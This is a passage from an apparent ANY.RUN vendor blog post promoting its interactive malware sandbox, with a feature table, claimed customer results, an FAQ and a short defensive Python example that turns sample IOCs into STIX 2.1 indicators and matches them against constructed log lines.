Speed, scalability, and integration also matter. Cloud-based sandboxes process hundreds of samples in parallel, deliver reports within minutes, and connect easily to SIEM, SOAR, or threat intelligence systems. Structured exports in formats like JSON or STIX/TAXII make automation effortless. 

60 seconds required to analyze phishing attack inside ANY.RUN’s malware sandbox 

Finally, consider privacy. If you work with sensitive or client data, make sure your sandbox offers private or isolated analysis modes. 

Options for running private analysis with ANY.RUN’s sandbox 

When choosing your sandbox, think beyond detection. Look for visibility, speed, flexibility, and control; the qualities that help you understand how malware behaves and stop it before it spreads. 

Why ANY.RUN Meets These Criteria 

If you take those same criteria and apply them to ANY.RUN, you’ll see how closely the platform aligns with what modern security teams need. 

Factor  How ANY.RUN Delivers It 
Behavioral visibility  Displays every system and network action in real time, with visualized process trees and detailed logs. 
Realistic environment  Simulates genuine user behavior, forcing evasive malware to reveal its payloads. 
Multiple OS environments  Supports Windows, Linux, Android analysis, with new profiles added regularly. 
Interactivity  Analysts can click, type, and interact with running samples — exposing behavior that static tools miss. 
Speed and scalability  Cloud infrastructure processes multiple samples in parallel, generating full reports in minutes. 
Automation and integrations  Connects with SIEM, SOAR, and TI tools via API or webhook for seamless workflow automation. 
Threat intelligence enrichment  Extracts IOCs, maps MITRE ATT&CK techniques, and links to related CVEs automatically. 
Clear, exportable reports  Offers human-readable summaries and structured outputs (JSON, STIX/TAXII). 
Privacy options  Private analysis mode ensures sensitive data stays isolated and secure. 
Ease of use  Intuitive interface and quick setup make analysis accessible to any skill level. 
Anti-evasion features  Randomized environments, user simulation, and adjustable runtime defeat stealthy malware tactics. 
Managed lookups & history  Analysts can search past public or private sessions and track recurring threats. 

ANY.RUN combines what most teams need from a sandbox: visibility, control, and speed; all in a secure, interactive cloud environment. It helps analysts move faster, collaborate better, and uncover behaviors that traditional tools simply can’t see. 

Teams Using ANY.RUN’s Interactive Sandbox Report Measurable Results: 

  • 95% of SOCs speed up investigations through real-time interaction and live analysis. 
  • Up to 3× higher SOC efficiency, with faster decision-making and automated data sharing. 
  • 21-minute reduction in mean time to respond (MTTR) per incident. 
  • 36% higher detection rate on average, uncovering hidden and multi-stage threats earlier. 
  • Up to 58% more threats detected overall, with behavioral visibility that static tools can’t match. 
  • 20% lower workload for Tier 1 analysts, as sandbox automation removes repetitive triage steps. 
  • 30% fewer Tier 1 → Tier 2 escalations, thanks to clearer, interactive analysis reports. 
  • 90% of threats visible within 60 seconds, allowing faster containment and less dwell time. 

For businesses, that means lower risk exposure, more productive analysts, and faster containment of incidents, all without expanding headcount or infrastructure. 

Frequently Asked Questions About Malware Sandboxes 

1. Do I need a malware sandbox if I already use antivirus software? 

Yes. Antivirus tools catch known threats using signatures, while a sandbox helps detect unknown or evolving malware by observing real behavior. Together, they form a stronger defense. 

2. Can malware escape a sandbox? 

It’s rare with modern platforms, but not impossible: a sandbox is only as isolated as the hypervisor or container boundary beneath it, and escape bugs in those layers are found and patched from time to time. Reputable sandboxes, especially cloud-based ones, layer strict isolation and network controls so that any malicious code stays contained, and they keep that isolation layer patched like any other software. 

3. How long does sandbox analysis take? 

Most analyses complete in a few minutes. Cloud sandboxes are faster because they can run multiple sessions at once and generate reports almost instantly. For instance, 90% of analyses carried out in the ANY.RUN sandbox take around 60 seconds. 

4. What’s the difference between static and dynamic malware analysis? 

Static analysis examines code without executing it. Dynamic analysis, which is what a sandbox performs, actually runs the file to observe its real behavior and system impact. 

5. How can I tell if a sandbox is effective? 

Look for detailed behavioral reports, IOC extraction, and options for interactivity or automation. If it helps you understand why a file is malicious, not just that it is, it’s doing its job well. 

6. Is cloud-based sandboxing secure for sensitive samples? 

Yes, when privacy features are enabled. Some solutions, like the ANY.RUN sandbox, let users run fully private sessions where samples and results stay completely isolated. 

7. What types of threats benefit most from sandbox analysis? 

Dynamic environments are especially useful for ransomware, downloaders, stealers, and phishing payloads, and more generally for malware that changes behavior based on context or timing. 

8. Can a sandbox integrate with my existing tools? 

Many modern sandboxes like ANY.RUN’s Interactive Sandbox support API connections, STIX/TAXII feeds, and SIEM/SOAR integrations. This allows automatic data sharing and faster incident response. 
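One concrete shape such an integration takes is exporting a sandbox session’s IOCs as STIX 2.1 Indicator objects (the format carried over TAXII) and letting the SIEM match them against its logs. The following is an added example, not ANY.RUN’s API, report format or integration code; the IOC list, the log lines and the `build_stix_bundle` / `match_logs` helpers are all constructed here for illustration.

```python
"""
Constructed example: package IOCs extracted from a sandbox session as a
STIX 2.1 bundle (the format carried by TAXII feeds) and match them against
SIEM-style log lines. The sample IOCs and log lines are made up for
illustration; nothing here is ANY.RUN's API or report format.
"""
import json
import re
import uuid
from datetime import datetime, timezone

# Constructed output of a hypothetical sandbox IOC export (not a real report).
SANDBOX_IOCS = [
    {"type": "domain", "value": "update-check.example.net"},
    {"type": "ipv4", "value": "203.0.113.45"},
    {"type": "sha256", "value": "a" * 64},
    {"type": "url", "value": "http://update-check.example.net/payload.bin"},
]

# IOC type -> STIX 2.1 pattern template over Cyber Observable objects.
PATTERNS = {
    "domain": "[domain-name:value = '{v}']",
    "ipv4": "[ipv4-addr:value = '{v}']",
    "sha256": "[file:hashes.'SHA-256' = '{v}']",
    "url": "[url:value = '{v}']",
}


def build_stix_bundle(iocs, source="sandbox-session-example"):
    """Wrap each IOC in a STIX 2.1 Indicator object and return a Bundle dict."""
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    objects = []
    for ioc in iocs:
        if ioc["type"] not in PATTERNS:
            continue  # skip types we have no pattern for rather than guessing
        objects.append({
            "type": "indicator",
            "spec_version": "2.1",
            "id": f"indicator--{uuid.uuid4()}",
            "created": now,
            "modified": now,
            "name": f"{ioc['type']} from {source}",
            "indicator_types": ["malicious-activity"],
            "pattern": PATTERNS[ioc["type"]].format(v=ioc["value"]),
            "pattern_type": "stix",
            "valid_from": now,
        })
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": objects}


# Matches the simple single-comparison patterns produced above.
_PATTERN_RE = re.compile(r"^\[([a-z0-9-]+):([A-Za-z0-9_.'-]+) = '([^']+)'\]$")


def extract_values(bundle):
    """Pull the literal observable values back out of simple STIX patterns."""
    values = {}
    for obj in bundle["objects"]:
        if obj.get("type") != "indicator":
            continue
        m = _PATTERN_RE.match(obj["pattern"])
        if m:
            values[m.group(3)] = obj["id"]
    return values


def match_logs(bundle, log_lines):
    """Return (line, indicator_id) for each log line containing an IOC value.

    This mimics what a SIEM does after ingesting a TAXII feed: a plain
    substring match, which is enough for domains, IPs, URLs and hashes.
    """
    values = extract_values(bundle)
    hits = []
    for line in log_lines:
        for value, ind_id in values.items():
            if value in line:
                hits.append((line, ind_id))
                break  # one hit per line is enough to raise a triage alert
    return hits


# Constructed proxy/DNS log lines for the demo (not real traffic).
SAMPLE_LOGS = [
    "2025-01-01T10:00:00Z dns query host=ws-17 qname=update-check.example.net",
    "2025-01-01T10:00:02Z proxy host=ws-17 dst=203.0.113.45:443 action=allow",
    "2025-01-01T10:00:05Z dns query host=ws-09 qname=intranet.example.org",
]

if __name__ == "__main__":
    bundle = build_stix_bundle(SANDBOX_IOCS)
    print(json.dumps(bundle, indent=2))
    for line, ind_id in match_logs(bundle, SAMPLE_LOGS):
        print(f"ALERT {ind_id}: {line}")
```

In a real deployment the bundle would be published to a TAXII collection (or pushed through the sandbox’s API into a SOAR playbook) rather than printed, and the matching side would be the SIEM’s own threat-intel lookup; the value of the format is that every indicator carries its provenance (`name`, `valid_from`) so an analyst can trace an alert back to the sandbox session that produced it.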

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, makes this kind of investigation fast and accessible. The service processes millions of analysis sessions and is trusted by 15,000+ organizations and over 500,000 professionals worldwide. 

Teams using ANY.RUN report measurable results: up to 3× higher SOC efficiency, 90% faster detection of unknown threats, and a 60% drop in false positives thanks to real-time interaction and behavior-based analysis. 

Explore ANY.RUN’s capabilities during a 14-day trial → 


The post What is a Malware Sandbox? Everything SOC Analysts and CISOs Need to Know appeared first on ANY.RUN’s Cybersecurity Blog.